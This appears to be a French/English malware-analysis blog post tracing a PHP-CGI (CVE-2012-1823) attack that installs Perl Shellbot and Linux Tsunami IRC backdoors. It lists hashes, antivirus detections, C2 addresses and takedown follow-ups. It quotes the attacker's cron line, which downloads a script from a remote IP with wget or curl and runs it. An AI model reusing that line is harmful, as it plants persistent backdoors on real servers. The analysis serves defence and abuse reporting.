[fr/en] Backdoor.Perl.Shellbot.B et Backdoor.Linux.Tsunami.A

Je regardais les logs modsec de quelques serveurs, celui-ci a attiré mon attention :

PHP_attack

Une machine OVH 91.121.87.116 qui tente une attaque PHP-CGI (CVE-2012-1823 ), le script complet est disponible là : http://pjjoint.malekal.com/files.php?read=20140331_g13q9u5i11j6
Ce dernier test les connexions SSH, le script a pour but de dropper un shell sur la machine victime.

Un cron est créé :

* * * * * cd /tmp;if [ ! -f /tmp/.rtn ];then wget 216.151.163.154/img/glyph/.o/rtn -O /tmp/.rtn;fi;if [ ! -f /tmp/.rtn ];then curl -O -s 216.151.163.154/img/glyph/.o/rtn;mv rtn .rtn;fi;chmod +x /tmp/.rtn;/tmp/.rtn;sh /tmp/.rtn

Le script rtn : http://pjjoint.malekal.com/files.php?read=20140331_h11t10r7m10w13 va dropper un Trojan.Tsunam dans /tmp/.httpd

https://www.virustotal.com/fr/file/8a53397b477da72ce55f115adaf6b8b2012633c5f80fd96f1f338b496d45ca76/analysis/1396250584/
https://www.virustotal.com/fr/file/a0d96cf6f06d2f3e3ef5023213c2827f59b89d14a1a61829c69cfcdf4148ce23/analysis/1396251275/

SHA256:91729ac3dab991cd612ef87bd05c14f6e6be7db52674b4493c36de7c33efff70
Nom du fichier :httpd.64
Ratio de détection :10 / 50
Date d’analyse :2014-03-31 07:25:10 UTC (il y a 0 minute)
AVGLinux/Tsunami.A20140330
AntiVirBDS/Katien.R20140331
AvastELF:Tsunami-L [Trj]20140331
CAT-QuickHealBackdoor.Linux.Tsunami.A20140330
ClamAVTrojan.Tsunami.B20140331
MicrosoftBackdoor:Linux/Tsunami.gen!A20140331
SophosLinux/Tsunami-A20140331
SymantecLinux.Backdoor.Kaiten20140331
TrendMicroELF_MANUST.SM20140331
TrendMicro-HouseCallELF_MANUST.SM20140331

Le script fait aussi un ftp sur 216.151.163.154 au cas où les adresses HTTP sont down ou bloqués par un Firewall :

PHP_attack2

Revenons à l’attaque initiale avec le ShellBot .bash_hist  : http://pjjoint.malekal.com/files.php?read=20140331_f10n15g14r12m11

https://www.virustotal.com/fr/file/a0d96cf6f06d2f3e3ef5023213c2827f59b89d14a1a61829c69cfcdf4148ce23/analysis/1396251275/

SHA256:a0d96cf6f06d2f3e3ef5023213c2827f59b89d14a1a61829c69cfcdf4148ce23
Nom du fichier :bla
Ratio de détection :19 / 48
Date d’analyse :2014-03-31 07:34:35 UTC (il y a 1 minute)
AVGPERL/ShellBot20140330
Ad-AwareBackdoor.Perl.Shellbot.B20140331
AgnitumPerl.Shellbot.I20140330
AntiVirPerl/Shellbot.a.620140331
AvastPerl:Shellbot-T [Trj]20140331
BitDefenderBackdoor.Perl.Shellbot.B20140331
GDataBackdoor.Perl.Shellbot.B20140331
IkarusBackdoor.Perl.Shellbot20140331
KasperskyBackdoor.Perl.Shellbot.a20140331
MicroWorld-eScanBackdoor.Perl.Shellbot.B20140331
MicrosoftBackdoor:Perl/Shellbot.S20140331
NANO-AntivirusTrojan.Script.IRCBot.ehmdg20140331
NormanShellbot.D20140331
PandaPHP/Santy.C20140330
RisingNORMAL:Script.Perl.Shellbot.a!14029420140330
SymantecIRC.Backdoor.Trojan20140331
TotalDefensePerl/Shellbot.A20140330
VIPREBackdoor.Perl.IRCBot.a (v)20140331
nProtectBackdoor.Perl.Shellbot.B20140330

Le serveur se trouve en France : $servidor=’84.246.226.5′ unless $servidor;
Sur une connexion Netissime.

Bref au final, assez classique.

 

Je résume ici les machines utilisées pour contacter les abuses :

Machine attaquante OVH : 91.121.105.21
216.151.163.154/img/glyph/.o/.bash_hist (NET-NJTECH – US)
catalysts.linkpc.net/img/glyph/.o/httpd.86 (216.151.163.154)

NetRange: 216.151.160.0 – 216.151.175.255
CIDR: 216.151.160.0/20
OriginAS:
NetName: NET-NJTECH
NetHandle: NET-216-151-160-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
Comment: http://www.njtech.com
RegDate: 2006-07-20
Updated: 2012-03-02
Ref: http://whois.arin.net/rest/net/NET-216-151-160-0-1

EDIT – September 25 : deeper analysis

Others attempt probably from the same guy, example : http://www.malekal.com/modsec/index.php?ip=194.60.242.251
Someone write an analysis : http://n01g3l.tumblr.com/post/97207371876/peak-internet-isp-production-server-serving-cnc

The Perl.Shellbot connect to an IRCd at 194.24.228.203
The analysis stop to this cron :

Linux_Tsunami_cronThe cron download a script, this script download a Linux.Tsunami depending of the OS architecture

Linux_Tsunami_cron2

Linux_TsunamiThis Linux.Tsunami connect to an other IRCd at 37.59.48.97 (OVH) – the server seems to be hacked.
The DNS ending.publicvm.com

Linux_Tsunami2

The Botmaster is called by Kelevra (the nickname is also in the PHP.Shellbot Code), using a channel #Borgir
Linux_Tsunami4

194.24.228.203 has been suspended fast (09/16/2014)
The IRCd at 37.59.48.97 is still online, maybe it take sometimes as the server seems to be hacked.
ending.publicvm.com has been frozen with the help of MalwareMustDie.

Got an other attempt 3 days ago with the same Perl.Shellbot

Linux_Tsunami_others_attempt

The script has still not be updated and  still using 194.24.228.203 which has been suspended.

Linux_Tsunami_others_attempt2So seems to be Script Kiddie way.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 82 times, 1 visits today)

One thought on “[fr/en] Backdoor.Perl.Shellbot.B et Backdoor.Linux.Tsunami.A

  1. Thanks you for letting us know this ! I had experienced the same the last days. Also my attack came from OVH. I wonder why these guys are not doing s.th. against their compromised servers. 🙁

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *